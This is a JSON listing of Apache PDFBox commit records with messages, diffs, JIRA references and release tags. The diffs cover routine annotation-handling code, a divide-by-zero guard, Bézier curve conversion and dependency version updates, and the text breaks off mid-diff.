"message": "PDFBOX-4212: changes to package names were not persisted - fix package name git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832776 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/AppearanceStyle.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/AppearanceStyle.java", + "index 5688ec385..377adb6ed 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/AppearanceStyle.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/AppearanceStyle.java", + "@@ -16,3 +16,3 @@", + " */", + "-package org.apache.pdfbox.pdmodel.interactive.annotation.text;", + "+package org.apache.pdfbox.pdmodel.interactive.annotation.layout;", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainText.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainText.java", + "index c61c8824c..165c8e455 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainText.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainText.java", + "@@ -16,3 +16,3 @@", + " */", + "-package org.apache.pdfbox.pdmodel.interactive.annotation.text;", + "+package org.apache.pdfbox.pdmodel.interactive.annotation.layout;" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/AppearanceStyle.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainText.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4212": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4212", + "relevance": 2 + } + ] + }, + { + "commit_id": "3452fc1e8d71796579366d55b6c40ea91810d5be", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1527300943, + "hunks": 2, + "message": "PDFBOX-3353: support /RD and /BE git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832289 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationFreeText.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationFreeText.java", + "index 75f97dd83..496b81101 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationFreeText.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationFreeText.java", + "@@ -22,2 +22,3 @@ import org.apache.pdfbox.cos.COSFloat;", + " import org.apache.pdfbox.cos.COSName;", + "+import org.apache.pdfbox.pdmodel.common.PDRectangle;", + " import org.apache.pdfbox.pdmodel.interactive.annotation.handlers.PDAppearanceHandler;", + "@@ -226,2 +227,60 @@ public class PDAnnotationFreeText extends PDAnnotationMarkup", + "+ /**", + "+ * This will set the border effect dictionary, specifying effects to be applied when drawing the", + "+ * line.", + "+ *", + "+ * @param be The border effect dictionary to set.", + "+ *", + "+ */", + "+ public void setBorderEffect(PDBorderEffectDictionary be)", + "+ {", + "+ getCOSObject().setItem(COSName.BE, be);", + "+ }", + "+", + "+ /**", + "+ * This will retrieve the border effect dictionary, specifying effects to be applied used in", + "+ * drawing the line.", + "+ *", + "+ * @return The border effect dictionary", + "+ */", + "+ public PDBorderEffectDictionary getBorderEffect()", + "+ {", + "+ COSBase base = getCOSObject().getDictionaryObject(COSName.BE);", + "+ if (base instanceof COSDictionary)", + "+ {", + "+ return new PDBorderEffectDictionary((COSDictionary) base);", + "+ }", + "+ return null;", + "+ }", + "+", + "+ /**", + "+ * This will set the rectangle difference rectangle. Giving the difference between the", + "+ * annotations rectangle and where the drawing occurs. (To take account of any effects applied", + "+ * through the BE entry for example)", + "+ *", + "+ * @param rd the rectangle difference", + "+ *", + "+ */", + "+ public void setRectDifference(PDRectangle rd)", + "+ {", + "+ getCOSObject().setItem(COSName.RD, rd);", + "+ }", + "+", + "+ /**", + "+ * This will get the rectangle difference rectangle. Giving the difference between the", + "+ * annotations rectangle and where the drawing occurs. (To take account of any effects applied", + "+ * through the BE entry for example)", + "+ *", + "+ * @return the rectangle difference", + "+ */", + "+ public PDRectangle getRectDifference()", + "+ {", + "+ COSBase base = getCOSObject().getDictionaryObject(COSName.RD);", + "+ if (base instanceof COSArray)", + "+ {", + "+ return new PDRectangle((COSArray) base);", + "+ }", + "+ return null;", + "+ }", + "+", + " /**" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationFreeText.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "4b032ac9eb84cc1c4cde0d129b9d33ef9feb4120", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1529078824, + "hunks": 1, + "message": "PDFBOX-4112: update surefire plugin version to current for jdk10 git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1833606 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/parent/pom.xml b/parent/pom.xml", + "index 5e35db3a0..3dd8dae3c 100644", + "--- a/parent/pom.xml", + "+++ b/parent/pom.xml", + "@@ -50,2 +50,8 @@", + " UTF-8", + "+", + "+ ", + "+ 2.21.0", + " " + ], + "changed_files": [ + "parent/pom.xml" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4112": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4112", + "relevance": 2 + } + ] + }, + { + "commit_id": "474f73167054ecab8a03e04c161838a0d4a1d2df", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1527274097, + "hunks": 1, + "message": "PDFBOX-3353: add methods for callout and line ending style git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832266 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationFreeText.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationFreeText.java", + "index 5d1a39feb..75f97dd83 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationFreeText.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationFreeText.java", + "@@ -171,3 +171,57 @@ public class PDAnnotationFreeText extends PDAnnotationMarkup", + " }", + "- ", + "+", + "+ /**", + "+ * This will set the coordinates of the callout line.", + "+ *", + "+ * @param callout An array of four or six numbers specifying a callout line attached to the free", + "+ * text annotation. Six numbers [ x1 y1 x2 y2 x3 y3 ] represent the starting, knee point, and", + "+ * ending coordinates of the line in default user space, four numbers [ x1 y1 x2 y2 ] represent", + "+ * the starting and ending coordinates of the line.", + "+ */", + "+ public final void setCallout(float[] callout)", + "+ {", + "+ COSArray newCallout = new COSArray();", + "+ newCallout.setFloatArray(callout);", + "+ getCOSObject().setItem(COSName.CL, newCallout);", + "+ }", + "+", + "+ /**", + "+ * This will get the coordinates of the callout line.", + "+ *", + "+ * @return An array of four or six numbers specifying a callout line attached to the free text", + "+ * annotation. Six numbers [ x1 y1 x2 y2 x3 y3 ] represent the starting, knee point, and ending", + "+ * coordinates of the line in default user space, four numbers [ x1 y1 x2 y2 ] represent the", + "+ * starting and ending coordinates of the line.", + "+ */", + "+ public float[] getCallout()", + "+ {", + "+ COSBase base = getCOSObject().getDictionaryObject(COSName.CL);", + "+ if (base instanceof COSArray)", + "+ {", + "+ return ((COSArray) base).toFloatArray();", + "+ }", + "+ return null;", + "+ }", + "+", + "+ /**", + "+ * This will set the line ending style.", + "+ *", + "+ * @param style The new style.", + "+ */", + "+ public final void setLineEndingStyle(String style)", + "+ {", + "+ getCOSObject().setName(COSName.LE, style);", + "+ }", + "+", + "+ /**", + "+ * This will retrieve the line ending style.", + "+ *", + "+ * @return The line ending style, possible values shown in the LE_ constants section, LE_NONE if", + "+ * missing, never null.", + "+ */", + "+ public String getLineEndingStyle()", + "+ {", + "+ return getCOSObject().getNameAsString(COSName.LE, PDAnnotationLine.LE_NONE);", + "+ } ", + "+", + " /**" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationFreeText.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "efeae65834ddfda272d8ef06168d79a90c7c515b", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1524995515, + "hunks": 0, + "message": "PDFBOX-4189: remove image that is no used git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1830501 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/examples/src/main/resources/org/apache/pdfbox/resources/ttf/bengali-correct-text.png b/examples/src/main/resources/org/apache/pdfbox/resources/ttf/bengali-correct-text.png", + "deleted file mode 100644", + "index b5aadd116..000000000", + "Binary files a/examples/src/main/resources/org/apache/pdfbox/resources/ttf/bengali-correct-text.png and /dev/null differ" + ], + "changed_files": [ + "examples/src/main/resources/org/apache/pdfbox/resources/ttf/bengali-correct-text.png" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4189": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4189", + "relevance": 2 + } + ] + }, + { + "commit_id": "3d971d66ca0c9c9d8d7ffa729eaea9838040c19e", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1524671724, + "hunks": 1, + "message": "PDFBOX-3353: add BorderEffect getter/setter git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1830095 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationPolygon.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationPolygon.java", + "index 1f4217edb..310251d44 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationPolygon.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationPolygon.java", + "@@ -79,2 +79,33 @@ public class PDAnnotationPolygon extends PDAnnotationMarkup", + "+ /**", + "+ * This will set the border effect dictionary, specifying effects to be applied when drawing the", + "+ * line.", + "+ *", + "+ * @param be The border effect dictionary to set.", + "+ *", + "+ */", + "+ public void setBorderEffect(PDBorderEffectDictionary be)", + "+ {", + "+ getCOSObject().setItem(COSName.BE, be);", + "+ }", + "+", + "+ /**", + "+ * This will retrieve the border effect dictionary, specifying effects to be applied used in", + "+ * drawing the line.", + "+ *", + "+ * @return The border effect dictionary", + "+ */", + "+ public PDBorderEffectDictionary getBorderEffect()", + "+ {", + "+ COSDictionary be = (COSDictionary) getCOSObject().getDictionaryObject(COSName.BE);", + "+ if (be != null)", + "+ {", + "+ return new PDBorderEffectDictionary(be);", + "+ }", + "+ else", + "+ {", + "+ return null;", + "+ }", + "+ }", + "+", + " /**" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationPolygon.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "5316af04abb8afff9d40ed26a47940b3f470058e", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1530635820, + "hunks": 1, + "message": "PDFBOX-4259: fix imports git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1835006 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/AddAnnotations.java b/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/AddAnnotations.java", + "index 56db227ef..6b744e1f9 100644", + "--- a/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/AddAnnotations.java", + "+++ b/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/AddAnnotations.java", + "@@ -39,2 +39,3 @@ import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationLine;", + " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationLink;", + "+import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationPolygon;", + " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationSquare;" + ], + "changed_files": [ + "examples/src/main/java/org/apache/pdfbox/examples/pdmodel/AddAnnotations.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4259": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4259", + "relevance": 2 + } + ] + }, + { + "commit_id": "aa2ed82a31d4951fbf77bd1c61bf36b9e9f91eb6", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1524671346, + "hunks": 7, + "message": "PDFBOX-4071: correct javadoc, fix typo git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/1.8@1830091 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationMarkup.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationMarkup.java", + "index 8e914f33c..6d886eb08 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationMarkup.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationMarkup.java", + "@@ -28,3 +28,3 @@ import java.util.Calendar;", + " /**", + "- * This class represents the additonal fields of a Markup type Annotation. See", + "+ * This class represents the additional fields of a Markup type Annotation. See", + " * section 12.5.6 of ISO32000-1:2008 (starting with page 390) for details on", + "diff --git a/preflight/src/main/java/org/apache/pdfbox/preflight/action/AbstractActionManager.java b/preflight/src/main/java/org/apache/pdfbox/preflight/action/AbstractActionManager.java", + "index 421fe2966..a0f04232b 100644", + "--- a/preflight/src/main/java/org/apache/pdfbox/preflight/action/AbstractActionManager.java", + "+++ b/preflight/src/main/java/org/apache/pdfbox/preflight/action/AbstractActionManager.java", + "@@ -115,6 +115,4 @@ public abstract class AbstractActionManager", + " /**", + "- * Call the valid(boolean, List) method with the additonalActionAuth set to false.", + "+ * Call the valid(boolean, List) method with the additionalActionAuth set to false.", + " * ", + "- * @param error", + "- * the validation error list to updated if the validation fails.", + " * @return", + "@@ -131,3 +129,3 @@ public abstract class AbstractActionManager", + " * Return false if the dictionary is invalid (ex : missing key). If the ActionManager represents an", + "- * AdditionalAction, this method returns false and updates the error list when the additonalActionAuth parameter is", + "+ * AdditionalAction, this method returns false and updates the error list when the additionalActionAuth parameter is", + " * set to false.", + "@@ -138,3 +136,3 @@ public abstract class AbstractActionManager", + " * ", + "- * @param additonalActionAuth", + "+ * @param additionalActionAuth", + " * boolean to know if an additional action is authorized.", + "@@ -143,5 +141,5 @@ public abstract class AbstractActionManager", + " */", + "- public boolean valid(boolean additonalActionAuth) throws ValidationException", + "+ public boolean valid(boolean additionalActionAuth) throws ValidationException", + " {", + "- if (isAdditionalAction() && !additonalActionAuth)", + "+ if (isAdditionalAction() && !additionalActionAuth)", + " {" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationMarkup.java", + "preflight/src/main/java/org/apache/pdfbox/preflight/action/AbstractActionManager.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4071": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "1.8.15", + "1.8.16", + "1.8.17" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4071", + "relevance": 2 + } + ] + }, + { + "commit_id": "8bee174efa54f392c06ec615f47f3c166e21b1e7", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1530975489, + "hunks": 4, + "message": "PDFBOX-4071: update bouncycastle version git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1835315 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/parent/pom.xml b/parent/pom.xml", + "index 364005320..9a1c4816d 100644", + "--- a/parent/pom.xml", + "+++ b/parent/pom.xml", + "@@ -56,2 +56,3 @@", + " 2.21.0", + "+ 1.60", + " ", + "@@ -84,3 +85,3 @@", + " bcprov-jdk15on", + "- 1.59", + "+ ${bouncycastle.version}", + " ", + "@@ -89,3 +90,3 @@", + " bcmail-jdk15on", + "- 1.59", + "+ ${bouncycastle.version}", + " ", + "@@ -94,3 +95,3 @@", + " bcpkix-jdk15on", + "- 1.59", + "+ ${bouncycastle.version}", + " " + ], + "changed_files": [ + "parent/pom.xml" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4071": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4071", + "relevance": 2 + } + ] + }, + { + "commit_id": "e3d94d5da9d7f1bd496ff57ecc13461d28205154", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1524760473, + "hunks": 2, + "message": "PDFBOX-3353: handle special case where quadpoints surface is empty git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1830241 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDStrikeoutAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDStrikeoutAppearanceHandler.java", + "index 15724195e..6cf33d043 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDStrikeoutAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDStrikeoutAppearanceHandler.java", + "@@ -115,12 +115,20 @@ public class PDStrikeoutAppearanceHandler extends PDAbstractAppearanceHandler", + " Math.pow(pathsArray[i * 8 + 1] - pathsArray[i * 8 + 5], 2)));", + "- float x0 = pathsArray[i * 8 + 4] + (pathsArray[i * 8] - ", + "- pathsArray[i * 8 + 4]) / len0 * (len0 / 2 - ab.width);", + "- float y0 = pathsArray[i * 8 + 5] + (pathsArray[i * 8 + 1] - ", + "- pathsArray[i * 8 + 5]) / len0 * (len0 / 2 - ab.width);", + "+ float x0 = pathsArray[i * 8 + 4];", + "+ float y0 = pathsArray[i * 8 + 5];", + "+ if (Float.compare(len0, 0) != 0)", + "+ {", + "+ // only if both coordinates are not identical to avoid divide by zero", + "+ x0 += (pathsArray[i * 8] - pathsArray[i * 8 + 4]) / len0 * (len0 / 2 - ab.width);", + "+ y0 += (pathsArray[i * 8 + 1] - pathsArray[i * 8 + 5]) / len0 * (len0 / 2 - ab.width);", + "+ }", + " float len1 = (float) (Math.sqrt(Math.pow(pathsArray[i * 8 + 2] - pathsArray[i * 8 + 6], 2) + ", + " Math.pow(pathsArray[i * 8 + 3] - pathsArray[i * 8 + 7], 2)));", + "- float x1 = pathsArray[i * 8 + 6] + (pathsArray[i * 8 + 2] - ", + "- pathsArray[i * 8 + 6]) / len1 * (len1 / 2 - ab.width);", + "- float y1 = pathsArray[i * 8 + 7] + (pathsArray[i * 8 + 3] - ", + "- pathsArray[i * 8 + 7]) / len1 * (len1 / 2 - ab.width);", + "+ float x1 = pathsArray[i * 8 + 6];", + "+ float y1 = pathsArray[i * 8 + 7];", + "+ if (Float.compare(len1, 0) != 0)", + "+ {", + "+ // only if both coordinates are not identical to avoid divide by zero", + "+ x1 += (pathsArray[i * 8 + 2] - pathsArray[i * 8 + 6]) / len1 * (len1 / 2 - ab.width);", + "+ y1 += (pathsArray[i * 8 + 3] - pathsArray[i * 8 + 7]) / len1 * (len1 / 2 - ab.width);", + "+ }", + " cs.moveTo(x0, y0);" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDStrikeoutAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "bec69941e3e12d924cbeb7e99c0a1ebb6c836fd5", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1532780442, + "hunks": 2, + "message": "PDFBOX-4281: remove Apache Wink dependency, add dependencies for class copied from Apache Wink git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1836892 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/examples/pom.xml b/examples/pom.xml", + "index 6201cf029..02dc795ac 100644", + "--- a/examples/pom.xml", + "+++ b/examples/pom.xml", + "@@ -87,7 +87,13 @@", + " ", + "- org.apache.wink", + "- wink-component-test-support", + "- 1.4", + "+ javax.servlet", + "+ javax.servlet-api", + "+ 4.0.1", + " test", + " ", + "+ ", + "+ org.apache.geronimo.specs", + "+ geronimo-jaxrs_1.1_spec", + "+ 1.0", + "+ test", + "+ ", + " " + ], + "changed_files": [ + "examples/pom.xml" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4281": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4281", + "relevance": 2 + } + ] + }, + { + "commit_id": "0bf49ccaa2c834a9b86d35f3500eb3825499ba93", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1530116371, + "hunks": 6, + "message": "PDFBOX-3353: convert quadratic B\u00c3\u00a9zier curve to cubic git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1834517 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", + "index 2e5708ed6..8d58eff54 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", + "@@ -536,5 +536,6 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + "-", + " private void addPath(final PDAppearanceContentStream contentStream, GeneralPath path) throws IOException", + " {", + "+ double curX = 0;", + "+ double curY = 0;", + " PathIterator it = path.getPathIterator(new AffineTransform());", + "@@ -552,6 +553,19 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + " (float) coords[3], (float) coords[4], (float) coords[5]);", + "+ curX = coords[4];", + "+ curY = coords[5];", + " break;", + " case PathIterator.SEG_QUADTO:", + "- contentStream.curveTo1((float) coords[0], (float) coords[1], (float) coords[2], (float) coords[3]);", + "- // not sure whether curveTo1 or curveTo2 is to be used here", + "+ // Convert quadratic B\u00c3\u00a9zier curve to cubic", + "+ // https://fontforge.github.io/bezier.html", + "+ // CP1 = QP0 + 2/3 *(QP1-QP0)", + "+ // CP2 = QP2 + 2/3 *(QP1-QP2)", + "+ double cp1x = curX + 2d / 3d * (coords[0] - curX);", + "+ double cp1y = curY + 2d / 3d * (coords[1] - curY);", + "+ double cp2x = coords[2] + 2d / 3d * (coords[0] - coords[2]);", + "+ double cp2y = coords[3] + 2d / 3d * (coords[1] - coords[3]);", + "+ contentStream.curveTo((float) cp1x, (float) cp1y,", + "+ (float) cp2x, (float) cp2y,", + "+ (float) coords[2], (float) coords[3]);", + "+ curX = coords[2];", + "+ curY = coords[3];", + " break;", + "@@ -559,2 +573,4 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + " contentStream.lineTo((float) coords[0], (float) coords[1]);", + "+ curX = coords[0];", + "+ curY = coords[1];", + " break;", + "@@ -562,2 +578,4 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + " contentStream.moveTo((float) coords[0], (float) coords[1]);", + "+ curX = coords[0];", + "+ curY = coords[1];", + " break;" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "569989ea8dff1c6f134b737b25e25fdf37d4ce00", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1526759268, + "hunks": 10, + "message": "PDFBOX-3353: refactor double code, move it to abstract class git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1831918 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", + "index 72626ee53..955b6510e 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", + "@@ -54,2 +54,4 @@ public abstract class PDAbstractAppearanceHandler implements PDAppearanceHandler", + "+ static final double ARROW_ANGLE = Math.toRadians(30);", + "+", + " /**", + "@@ -275,3 +277,138 @@ public abstract class PDAbstractAppearanceHandler implements PDAppearanceHandler", + " }", + "- ", + "+", + "+ void drawStyle(String style, final PDAppearanceContentStream cs, float x, float y,", + "+ float width, boolean hasStroke, boolean hasBackground) throws IOException", + "+ {", + "+ switch (style)", + "+ {", + "+ case PDAnnotationLine.LE_OPEN_ARROW:", + "+ case PDAnnotationLine.LE_CLOSED_ARROW:", + "+ if (Float.compare(x, 0) != 0)", + "+ {", + "+ // ending", + "+ drawArrow(cs, x - width, y, -width * 9);", + "+ }", + "+ else", + "+ {", + "+ // start", + "+ drawArrow(cs, width, y, width * 9);", + "+ }", + "+ if (PDAnnotationLine.LE_CLOSED_ARROW.equals(style))", + "+ {", + "+ cs.closePath();", + "+ }", + "+ break;", + "+ case PDAnnotationLine.LE_BUTT:", + "+ 